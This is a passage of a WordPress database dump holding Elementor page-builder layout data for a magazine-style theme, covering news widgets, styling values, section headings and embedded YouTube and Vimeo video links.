",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"209drec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\"},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1442,495,'_elementor_version','0.4'),(1443,495,'_elementor_css','a:3:{s:4:\"time\";i:1508921392;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1445,496,'_elementor_edit_mode','builder'),(1446,496,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"209drec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\"},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1447,496,'_elementor_version','0.4'),(1448,496,'_elementor_css','a:3:{s:4:\"time\";i:1508921464;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1450,497,'_elementor_edit_mode','builder'),(1451,497,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\